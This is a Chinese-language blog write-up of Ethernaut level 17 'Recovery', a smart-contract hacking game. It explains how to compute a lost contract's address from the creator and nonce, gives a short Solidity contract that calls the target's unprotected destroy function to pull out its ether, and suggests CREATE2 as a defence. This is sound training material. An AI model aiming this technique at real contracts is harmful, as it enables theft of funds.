# 智能合约黑客攻击 Ethernaut:  
 17. Recovery

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-17-recovery

## Content

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。教程GitHub - 攻击代码Bilibili - 视频教程YouTube - 视频教程TikTok - ….题目Recovery 创建 SimpleToken 合约地址忘记了，而且向里面转了0.001 ether 个ether， 需要想办法吧ether转出来。Hack思路找到丢失的合约地址模拟计算方法,原来是标准的创建，很容模拟。其他技巧调用 destroy 方法攻击代码interface ISimpleToken { function destroy(address payable _to) external; } contract RecoveryHack { ISimpleToken public exploitInst; address public simpleToken; constructor(address _target) { simpleToken = address(uint160(uint256(keccak256(abi.encodePacked(uint8(0xd6), uint8(0x94), _target, uint8(0x01)))))); exploitInst = ISimpleToken(simpleToken); } function attack() external { exploitInst.destroy(payable(msg.sender)); } } Hack案例…防范思路合约中创建尽量使用 Create2，而不是使用标准的new 来创建。 标准创建keccak256(rlp(senderAddress, nonce))[12:31] 参考资料EIP-1014: Skinny CREATE2RECURSIVE-LENGTH PREFIX (RLP) SERIALIZATIONDeploying Smart Contracts Using CREATE2EVM CODEHow is the address of an Ethereum contract computed?

## Publication Information

- [Leek DEV](https://paragraph.com/@leekdev/): Publication homepage
- [All Posts](https://paragraph.com/@leekdev/): More posts from this publication
- [RSS Feed](https://api.paragraph.com/blogs/rss/@leekdev): Subscribe to updates
- [Twitter](https://twitter.com/LeekDEV): Follow on Twitter